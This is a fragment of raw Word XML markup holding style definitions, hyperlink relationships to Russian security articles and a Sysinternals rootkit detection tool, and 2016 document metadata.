    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F520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6F520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6F520C"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0040515C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E6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ahabr.ru/post/145948/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xakep.ru/2008/03/20/428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ootkit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0%D1%83%D1%82%D0%BA%D0%B8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xakep.ru/local/search/search.asp?text=%D0%A0%D1%83%D1%81%D1%81%D0%B8%D0%BD%D0%BE%D0%B2%D0%B8%D1%87&amp;p=1" TargetMode="Externa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oot_(%D1%81%D1%83%D0%BF%D0%B5%D1%80%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/technet/sysinternals/Utilities/RootkitRevealer.m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69B03-9432-40B7-87E9-08F50A4E8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30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-13T21:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-20T19:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>